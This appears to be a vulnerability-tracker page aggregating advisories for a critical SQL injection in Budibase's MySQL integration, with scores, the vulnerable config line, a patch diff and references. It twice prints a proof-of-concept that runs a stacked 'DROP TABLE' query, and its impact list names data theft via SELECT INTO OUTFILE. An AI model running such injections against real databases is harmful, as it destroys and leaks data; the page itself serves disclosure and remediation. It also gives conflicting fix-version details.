CVE-2026-73300
Budibase: SQL Injection via `multipleStatements: true`
Budibase is an open-source low-code platform. Prior to 3.40.0, the MySQL integration component in Budibase is configured with multipleStatements: true, enabling execution of multiple SQL statements in a single query. Attackers can inject malicious SQL commands through user input fields, leading to complete database compromise. This vulnerability is fixed in 3.40.0.
Attack profile
How easy it is to exploit
- Attack vector
- Network
- Complexity
- Low
- Privileges needed
- None
- User interaction
- Required
What an attacker can affect
- Confidentiality
- High
- Integrity
- High
- Availability
- High
Exploit likelihood
What each source reports
CVE List Score used
9.6
Budibase: SQL Injection via `multipleStatements: true`
Budibase is an open-source low-code platform. Prior to 3.40.0, the MySQL integration component in Budibase is configured with multipleStatements: true, enabling execution of multiple SQL statements in a single query. Attackers can inject malicious SQL commands through user input fields, leading to complete database compromise. This vulnerability is fixed in 3.40.0.
- Record
CVE-2026-73300- CVSS 3.1
- 9.6 Critical
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H - Weakness
- CWE-89
- Updated
- 2026-11-02
EUVDEUVD-2026-57394
9.6
Budibase is an open-source low-code platform. Prior to 3.40.0, the MySQL integration component in Budibase is configured with multipleStatements: true, enabling execution of multiple SQL statements in a single query. Attackers can inject malicious SQL commands through user input fields, leading to complete database compromise. This vulnerability is fixed in 3.40.0.
- Record
EUVD-2026-57394- CVSS 3.1
- 9.6 Critical
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H - Updated
- 2026-11-02
GitHub AdvisoriesGHSA-q6x4-v3qx-85qw
9.6
Budibase: SQL Injection via `multipleStatements: true`
Summary
A critical SQL injection vulnerability was discovered in Budibase's MySQL integration that allows remote attackers to execute arbitrary SQL commands.
Details
Vulnerability Type
SQL Injection
Description
The MySQL integration component in Budibase is configured with multipleStatements: true, enabling execution of multiple SQL statements in a single query. Attackers can inject malicious SQL commands through user input fields, leading to complete database compromise.
Location
// File: packages/server/src/integrations/mysql.ts
// Line: 173
this.config = {
...config,
typeCast: defaultTypeCasting,
multipleStatements: true, // VULNERABLE
timezone: "Z",
}
Proof of Concept
Exploit
const mysql = require('mysql2');
// Budibase vulnerable configuration
const connection = mysql.createConnection({
host: 'localhost',
user: 'root',
password: 'password',
multipleStatements: true, // Vulnerable setting
timezone: "Z"
});
// Attack: Data destruction
connection.query(
`SELECT * FROM users WHERE id = 1; DROP TABLE sensitive_data; --`,
(err, results) => {
if (!err) console.log("Table dropped successfully");
}
);
Impact
- Data Destruction: Execute DROP TABLE, DELETE commands
- Data Theft: Exfiltrate data via SELECT INTO OUTFILE
- Privilege Escalation: Grant database admin privileges
- Denial of Service: Disrupt service operations
- Complete Database Compromise: Full control over database
Remediation
Patch
--- a/packages/server/src/integrations/mysql.ts
+++ b/packages/server/src/integrations/mysql.ts
@@ -170,7 +170,7 @@ class MySQLIntegration extends Sql implements DatasourcePlus {
this.config = {
...config,
typeCast: defaultTypeCasting,
- multipleStatements: true,
+ multipleStatements: false,
timezone: "Z",
}
}
Workarounds
- Temporarily disable MySQL integration
- Implement web application firewall (WAF)
- Restrict database user privileges
- Record
GHSA-q6x4-v3qx-85qw- CVSS 3.1
- 9.6 Critical
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H - Weakness
- CWE-89
- Updated
- 2026-11-02
NVD
9.6
Budibase is an open-source low-code platform. Prior to 3.40.0, the MySQL integration component in Budibase is configured with multipleStatements: true, enabling execution of multiple SQL statements in a single query. Attackers can inject malicious SQL commands through user input fields, leading to complete database compromise. This vulnerability is fixed in 3.40.0.
- Record
CVE-2026-73300- CVSS 3.1
- 9.6 Critical
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H - Weakness
- CWE-89
- Updated
- 2026-11-02
OSV
9.6
Budibase: SQL Injection via `multipleStatements: true`
Budibase is an open-source low-code platform. Prior to 3.40.0, the MySQL integration component in Budibase is configured with multipleStatements: true, enabling execution of multiple SQL statements in a single query. Attackers can inject malicious SQL commands through user input fields, leading to complete database compromise. This vulnerability is fixed in 3.40.0.
- Record
CVE-2026-73300- CVSS 3.1
- 9.6 Critical
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H - Weakness
- CWE-89
- Updated
- 2026-11-02
OSVGHSA-q6x4-v3qx-85qw
9.6
Budibase: SQL Injection via `multipleStatements: true`
Summary
A critical SQL injection vulnerability was discovered in Budibase's MySQL integration that allows remote attackers to execute arbitrary SQL commands.
Details
Vulnerability Type
SQL Injection
Description
The MySQL integration component in Budibase is configured with multipleStatements: true, enabling execution of multiple SQL statements in a single query. Attackers can inject malicious SQL commands through user input fields, leading to complete database compromise.
Location
// File: packages/server/src/integrations/mysql.ts
// Line: 173
this.config = {
...config,
typeCast: defaultTypeCasting,
multipleStatements: true, // VULNERABLE
timezone: "Z",
}
Proof of Concept
Exploit
const mysql = require('mysql2');
// Budibase vulnerable configuration
const connection = mysql.createConnection({
host: 'localhost',
user: 'root',
password: 'password',
multipleStatements: true, // Vulnerable setting
timezone: "Z"
});
// Attack: Data destruction
connection.query(
`SELECT * FROM users WHERE id = 1; DROP TABLE sensitive_data; --`,
(err, results) => {
if (!err) console.log("Table dropped successfully");
}
);
Impact
- Data Destruction: Execute DROP TABLE, DELETE commands
- Data Theft: Exfiltrate data via SELECT INTO OUTFILE
- Privilege Escalation: Grant database admin privileges
- Denial of Service: Disrupt service operations
- Complete Database Compromise: Full control over database
Remediation
Patch
--- a/packages/server/src/integrations/mysql.ts
+++ b/packages/server/src/integrations/mysql.ts
@@ -170,7 +170,7 @@ class MySQLIntegration extends Sql implements DatasourcePlus {
this.config = {
...config,
typeCast: defaultTypeCasting,
- multipleStatements: true,
+ multipleStatements: false,
timezone: "Z",
}
}
Workarounds
- Temporarily disable MySQL integration
- Implement web application firewall (WAF)
- Restrict database user privileges
- Record
GHSA-q6x4-v3qx-85qw- CVSS 3.1
- 9.6 Critical
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H - Weakness
- CWE-89
- Updated
- 2026-11-02
Affected products
Affected packages
| Package | Affected | Fixed |
|---|---|---|
@budibase/servernpm |
through 3.38.1 | None known |
History
| Recorded | Changed | Sources |
|---|---|---|
| first indexed | CVE List, EUVD, GitHub Advisories, NVD, OSV |
Dates are when Every CVE recorded each change. Upstream dates may differ.
In short
CVE-2026-73300 is a critical vulnerability (CVSS 9.6) in Budibase, published July 24, 2026. No source lists public exploit code. EPSS puts the chance of exploitation in the next 30 days at 0.56%, the 47th percentile. No source names a fixed version.
References
github.com/Budibase/budibase/security/advisories/GHSA-q6x4-v3qx-85qw
github.com/Budibase/budibase/releases/tag/3.40.0
nvd.nist.gov/vuln/detail/CVE-2026-73300
github.com/advisories/GHSA-q6x4-v3qx-85qw
github.com/CVEProject/cvelistV5/tree/main/cves/2026/73xxx/CVE-2026-73300.json
github.com/Budibase/budibase